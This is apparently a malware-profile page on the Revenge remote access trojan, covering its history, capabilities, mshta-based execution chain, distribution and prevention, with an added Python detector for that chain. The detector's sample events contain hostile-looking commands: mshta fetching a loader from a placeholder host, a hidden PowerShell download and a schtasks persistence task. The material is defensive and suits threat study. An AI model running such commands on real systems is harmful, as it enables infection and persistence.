Revenge

Revenge was one of the most popular remote access trojans in use in 2019, when it featured in a large malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy on its victims.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2016
Last seen: 18 February, 2020
Global rank: 30
Week rank: 18
Month rank: 28
IOCs: 836

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans (RATs), which means attackers typically use it to control infected PCs remotely or to spy on users by monitoring keystrokes and even the computer's surroundings through remote access to the webcam and microphone.

Discovered for the first time in 2016, Revenge RAT remains a threat today, with a big spike in popularity observed in 2019, when the malware was seen targeting corporations and government structures around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods, a robust core feature-set and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. Its popularity was further aided by its open-source nature – anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with the nickname Napoleon, an Arabic-speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that offered little, if any, code obfuscation and was mainly used by other Arabic-speaking cybercriminals. Despite the simplicity of the malware, at the time only one of the 54 VirusTotal scanners could pick up the malicious nature of the Revenge code, which puzzled researchers given the lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release, providing only the most basic functions and clearly losing to competitors in terms of core feature-set. According to Napoleon, this is why Revenge was available free of charge.

Two months after the initial release, the author issued version v0.2 on a more popular hacking forum, this time with more features but still completely free of charge. Since then Revenge has evolved even further, and today it offers cybercriminals a wide range of capabilities, including remote alteration of files and the registry on an infected machine, access to memory, processes and services, and access to connected devices such as keyboards, webcams and mice. This allows the malware to record the actions of its victims and collect information such as banking credentials and social account data.

The core malicious feature-set was not the only thing that evolved over the course of Revenge's lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed from the HTML of a custom blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds.

Figure 1: The lifecycle of Revenge shown as a process graph generated by ANY.RUN.

Figure 2: A customizable text report generated by the ANY.RUN malware analysis service, which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

The first steps of Revenge trojan execution may vary depending on how it made its way onto the victim's computer. The most common initial infiltration vector is the use of Mshta.exe, either to download the payload or to execute it directly from a URL. After the payload is delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes: cmd.exe, powershell.exe and schtasks.exe. It starts cmd.exe to kill processes from a list; in the given example, processes from the Microsoft Office suite were targeted. Powershell.exe is launched to download the main payload. In turn, schtasks.exe is launched to create a scheduled task, which gives Revenge persistence on the infected system. After all these steps, the malware is ready to execute commands from its C2 servers.
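As an added example that is not part of the original ANY.RUN report, the following Python flags the mshta.exe to cmd.exe/powershell.exe/schtasks.exe chain described above in process-creation telemetry. The records, field layout, PIDs, paths and command lines are constructed Sysmon-like sample data, not output from the analysis service.

```python
"""Detect the Revenge-style mshta.exe execution chain in process-creation
events: mshta.exe run against a URL, then spawning cmd.exe, powershell.exe
and schtasks.exe (with schtasks /create as the persistence step)."""
import re

# Constructed sample events (not real telemetry): (pid, ppid, image path, command line)
EVENTS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/loader.hta"),
    (300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c taskkill /f /im winword.exe"),
    (400, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -WindowStyle Hidden -Command (download stage, elided)"),
    (500, 200, r"C:\Windows\System32\schtasks.exe", "schtasks.exe /create /sc minute /mo 5 /tn Update /tr (payload path, elided)"),
    (600, 100, r"C:\Windows\System32\mshta.exe", "mshta.exe C:\\Users\\u\\help.hta"),  # local .hta, no URL
    (700, 600, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "schtasks.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of an image path, e.g. 'mshta.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_mshta_chain(events):
    """Return (pid, tag) findings: mshta.exe fetching a URL, and mshta.exe
    spawning cmd/powershell/schtasks, with schtasks /create tagged as persistence."""
    by_pid = {pid: (ppid, img, cmd) for pid, ppid, img, cmd in events}
    findings = []
    for pid, ppid, img, cmd in events:
        name = image_name(img)
        if name == "mshta.exe" and URL_RE.search(cmd):
            findings.append((pid, "mshta_remote_url"))
        parent = by_pid.get(ppid)
        if parent and image_name(parent[1]) == "mshta.exe" and name in SUSPICIOUS_CHILDREN:
            tag = "mshta_spawns_" + name[:-4]
            if name == "schtasks.exe" and "/create" in cmd.lower():
                tag = "mshta_schtasks_persistence"
            findings.append((pid, tag))
    return findings


def mshta_chains(events):
    """PIDs of mshta.exe instances whose children cover all three stages (cmd, powershell, schtasks)."""
    children = {}
    for _, ppid, img, _ in events:
        children.setdefault(ppid, set()).add(image_name(img))
    return [pid for pid, _, img, _ in events
            if image_name(img) == "mshta.exe" and SUSPICIOUS_CHILDREN <= children.get(pid, set())]
```

The second mshta.exe instance (a local .hta that only opens notepad.exe) produces no finding, which keeps the rule from firing on every HTA launch.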

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and kept up to date. Do not disable native Windows security features, update the OS regularly, and follow best practices for staying safe online.

In particular, avoid downloading email attachments from unknown senders, and never enable macros in Microsoft Office when prompted to do so by a file downloaded from a suspicious email.

Distribution of Revenge

Revenge has been distributed in a variety of ways, some of them more effective than others. For example, Revenge is known to infect PCs through malicious email attachments and malicious ads on compromised websites.

Most commonly, once delivered in a Microsoft Office file that the potential victim downloads and opens, Revenge uses macros to connect to an outside domain, sometimes hidden in a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can see which MITRE ATT&CK™ MATRIX techniques the malware applied by clicking the "ATT&CK™ MATRIX" button.

Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Access Trojans. It began its life as a simplistic piece of malware with basic functionality and no anti-analysis features, but has evolved into a capable and persistent trojan used in massive attacks in Europe, North America, Asia and the Middle East.

The popularity of this malware is due not only to its robust feature-set but also to its ready availability, since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a solid defense against Revenge and similar RATs, and secure their corporate or government networks, by reverse engineering and studying the threat using malware hunting services like ANY.RUN.

IOCs

